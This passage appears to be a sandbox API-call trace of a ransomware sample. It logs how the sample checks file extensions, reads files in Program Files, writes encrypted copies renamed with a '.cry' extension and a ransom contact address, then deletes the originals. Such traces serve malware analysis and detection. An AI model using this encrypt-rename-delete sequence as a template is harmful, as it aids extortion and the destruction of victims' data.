(lpString1=".1cd", lpString2=".inc") returned -1 [0049.552] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0049.552] lstrlenW (lpString=".jpg") returned 4 [0049.552] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0049.552] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0049.552] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0049.552] lstrlenW (lpString=".doc") returned 4 [0049.552] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0049.552] lstrlenW (lpString=".docx") returned 5 [0049.552] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0049.552] lstrlenW (lpString=".pdf") returned 4 [0049.552] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0049.552] lstrlenW (lpString=".xls") returned 4 [0049.552] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0049.553] lstrlenW (lpString=".xlsx") returned 5 [0049.553] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0049.553] lstrlenW (lpString=".ppt") returned 4 [0049.553] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0049.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0049.553] lstrlenW (lpString=".zip") returned 4 [0049.553] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0049.553] lstrlenW (lpString=".rar") returned 4 [0049.553] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0049.553] lstrlenW (lpString=".bz2") returned 4 [0049.553] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0049.553] lstrlenW (lpString=".7z") returned 3 [0049.553] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0049.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0049.553] lstrlenW (lpString=".dbf") returned 4 [0049.553] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0049.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0049.553] lstrlenW (lpString=".1cd") returned 4 [0049.553] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0049.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0049.553] lstrlenW (lpString=".jpg") returned 4 [0049.553] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0049.553] lstrcmpiW (lpString1=".inc", lpString2=".cry") returned 1 [0049.553] lstrlenW (lpString="oledbvbs.inc") returned 12 [0049.553] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0049.588] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=9975) returned 1 [0049.588] CloseHandle (hObject=0x1bc) returned 1 [0049.589] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc")) returned 0x20 [0049.589] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0049.589] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0049.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0049.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0049.589] lstrlenW (lpString=".doc") returned 4 [0049.589] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0049.589] lstrlenW (lpString=".docx") returned 5 [0049.589] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0049.589] lstrlenW (lpString=".pdf") returned 4 [0049.589] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0049.589] lstrlenW (lpString=".xls") returned 4 [0049.589] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0049.589] lstrlenW (lpString=".xlsx") returned 5 [0049.589] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0049.589] lstrlenW (lpString=".ppt") returned 4 [0049.589] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0049.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0049.589] lstrlenW (lpString=".zip") returned 4 [0049.589] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0049.589] lstrlenW (lpString=".rar") returned 4 [0049.589] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0049.589] lstrlenW (lpString=".bz2") returned 4 [0049.589] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0049.589] lstrlenW (lpString=".7z") returned 3 [0049.589] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0049.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0049.589] lstrlenW (lpString=".dbf") returned 4 [0049.589] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0049.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0049.590] lstrlenW (lpString=".1cd") returned 4 [0049.590] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0049.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0049.590] lstrlenW (lpString=".jpg") returned 4 [0049.590] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0049.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0049.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0049.590] lstrlenW (lpString=".doc") returned 4 [0049.590] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0049.590] lstrlenW (lpString=".docx") returned 5 [0049.590] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0049.590] lstrlenW (lpString=".pdf") returned 4 [0049.590] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0049.590] lstrlenW (lpString=".xls") returned 4 [0049.590] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0049.590] lstrlenW (lpString=".xlsx") returned 5 [0049.590] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0049.590] lstrlenW (lpString=".ppt") returned 4 [0049.590] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0049.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0049.590] lstrlenW (lpString=".zip") returned 4 [0049.590] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0049.590] lstrlenW (lpString=".rar") returned 4 [0049.590] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0049.590] lstrlenW (lpString=".bz2") returned 4 [0049.590] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0049.590] lstrlenW (lpString=".7z") returned 3 [0049.591] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0049.591] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0049.591] lstrlenW (lpString=".dbf") returned 4 [0049.591] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0049.591] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0049.591] lstrlenW (lpString=".1cd") returned 4 [0049.591] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0049.591] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0049.591] lstrlenW (lpString=".jpg") returned 4 [0049.591] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0049.591] lstrcmpiW (lpString1=".png", lpString2=".cry") returned 1 [0049.591] lstrlenW (lpString="16to9Squareframe_Buttongraphic.png") returned 34 [0049.591] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0049.597] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=10123) returned 1 [0049.597] CloseHandle (hObject=0x1bc) returned 1 [0049.597] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png")) returned 0x20 [0049.598] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0049.598] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0049.598] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0049.598] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0049.598] lstrlenW (lpString=".doc") returned 4 [0049.598] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0049.598] lstrlenW (lpString=".docx") returned 5 [0049.598] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0049.598] lstrlenW (lpString=".pdf") returned 4 [0049.598] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0049.598] lstrlenW (lpString=".xls") returned 4 [0049.598] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0049.598] lstrlenW (lpString=".xlsx") returned 5 [0049.598] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0049.598] lstrlenW (lpString=".ppt") returned 4 [0049.598] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0049.598] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0049.598] lstrlenW (lpString=".zip") returned 4 [0049.598] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0049.598] lstrlenW (lpString=".rar") returned 4 [0049.598] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0049.598] lstrlenW (lpString=".bz2") returned 4 [0049.598] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0049.598] lstrlenW (lpString=".7z") returned 3 [0049.598] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0049.598] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0049.598] lstrlenW (lpString=".dbf") returned 4 [0049.598] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0049.598] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0049.598] lstrlenW (lpString=".1cd") returned 4 [0049.598] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0049.598] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0049.598] lstrlenW (lpString=".jpg") returned 4 [0049.599] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0049.599] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0049.599] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0049.599] lstrlenW (lpString=".doc") returned 4 [0049.599] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0049.599] lstrlenW (lpString=".docx") returned 5 [0049.599] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0049.599] lstrlenW (lpString=".pdf") returned 4 [0049.599] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0049.599] lstrlenW (lpString=".xls") returned 4 [0049.599] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0049.599] lstrlenW (lpString=".xlsx") returned 5 [0049.599] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0049.599] lstrlenW (lpString=".ppt") returned 4 [0049.599] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0049.599] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0049.599] lstrlenW (lpString=".zip") returned 4 [0049.599] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0049.599] lstrlenW (lpString=".rar") returned 4 [0049.599] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0049.599] lstrlenW (lpString=".bz2") returned 4 [0049.599] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0049.599] lstrlenW (lpString=".7z") returned 3 [0049.599] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0049.599] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0049.599] lstrlenW (lpString=".dbf") returned 4 [0049.599] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0049.599] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0049.599] lstrlenW (lpString=".1cd") returned 4 [0049.599] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0049.599] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0049.599] lstrlenW (lpString=".jpg") returned 4 [0049.599] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0049.600] lstrcmpiW (lpString1=".png", lpString2=".cry") returned 1 [0049.600] lstrlenW (lpString="16to9Squareframe_SelectionSubpicture.png") returned 40 [0049.600] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0049.600] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=3286) returned 1 [0049.600] CloseHandle (hObject=0x1bc) returned 1 [0049.600] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png")) returned 0x20 [0049.600] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0049.600] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0049.600] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84 [0049.600] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84 [0049.600] lstrlenW (lpString=".doc") returned 4 [0049.600] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0049.600] lstrlenW (lpString=".docx") returned 5 [0049.600] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0049.600] lstrlenW (lpString=".pdf") returned 4 [0049.600] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0049.600] lstrlenW (lpString=".xls") returned 4 [0049.600] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0049.600] lstrlenW (lpString=".xlsx") returned 5 [0049.600] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0049.601] lstrlenW (lpString=".ppt") returned 4 [0049.601] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0049.601] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84 [0049.601] lstrlenW (lpString=".zip") returned 4 [0049.601] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0049.601] lstrlenW (lpString=".rar") returned 4 [0049.601] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0049.601] lstrlenW (lpString=".bz2") returned 4 [0049.601] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0049.601] lstrlenW (lpString=".7z") returned 3 [0049.601] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0049.601] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84 [0049.601] lstrlenW (lpString=".dbf") returned 4 [0049.601] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0050.306] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0050.701] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.701] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.701] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0050.701] GetLastError () returned 0x0 [0050.701] ReadFile (in: hFile=0x200, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x4932, lpOverlapped=0x0) returned 1 [0050.825] WriteFile (in: hFile=0x194, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x4940, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x4940, lpOverlapped=0x0) returned 1 [0050.827] ReadFile (in: hFile=0x200, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.827] WriteFile (in: hFile=0x194, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0050.827] SetEndOfFile (hFile=0x194) returned 1 [0050.827] CloseHandle (hObject=0x194) returned 1 [0050.827] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.827] SetEndOfFile (hFile=0x200) returned 1 [0050.828] CloseHandle (hObject=0x200) returned 1 [0050.828] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0050.828] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl")) returned 1 [0050.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0050.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0050.828] lstrlenW (lpString=".doc") returned 4 [0050.828] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0050.829] lstrlenW (lpString=".docx") returned 5 [0050.829] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0050.829] lstrlenW (lpString=".pdf") returned 4 [0050.829] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0050.829] lstrlenW (lpString=".xls") returned 4 [0050.829] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0050.829] lstrlenW (lpString=".xlsx") returned 5 [0050.829] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0050.829] lstrlenW (lpString=".ppt") returned 4 [0050.829] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0050.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0050.829] lstrlenW (lpString=".zip") returned 4 [0050.829] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0050.829] lstrlenW (lpString=".rar") returned 4 [0050.829] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0050.829] lstrlenW (lpString=".bz2") returned 4 [0050.829] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0050.829] lstrlenW (lpString=".7z") returned 3 [0050.829] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0050.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0050.829] lstrlenW (lpString=".dbf") returned 4 [0050.829] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0050.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0050.829] lstrlenW (lpString=".1cd") returned 4 [0050.829] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0050.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0050.829] lstrlenW (lpString=".jpg") returned 4 [0050.829] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0050.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0050.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0050.829] lstrlenW (lpString=".doc") returned 4 [0050.829] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0050.829] lstrlenW (lpString=".docx") returned 5 [0050.829] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0050.829] lstrlenW (lpString=".pdf") returned 4 [0050.829] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0050.829] lstrlenW (lpString=".xls") returned 4 [0050.830] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0050.830] lstrlenW (lpString=".xlsx") returned 5 [0050.830] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0050.830] lstrlenW (lpString=".ppt") returned 4 [0050.830] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0050.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0050.830] lstrlenW (lpString=".zip") returned 4 [0050.830] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0050.830] lstrlenW (lpString=".rar") returned 4 [0050.830] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0050.830] lstrlenW (lpString=".bz2") returned 4 [0050.830] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0050.830] lstrlenW (lpString=".7z") returned 3 [0050.830] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0050.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0050.830] lstrlenW (lpString=".dbf") returned 4 [0050.830] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0050.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0050.830] lstrlenW (lpString=".1cd") returned 4 [0050.830] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0050.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0050.830] lstrlenW (lpString=".jpg") returned 4 [0050.830] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0050.830] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0050.830] lstrlenW (lpString="AG00037_.GIF") returned 12 [0050.830] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0050.843] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=6684) returned 1 [0050.843] CloseHandle (hObject=0x1f0) returned 1 [0050.843] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif")) returned 0x20 [0050.843] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.843] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft 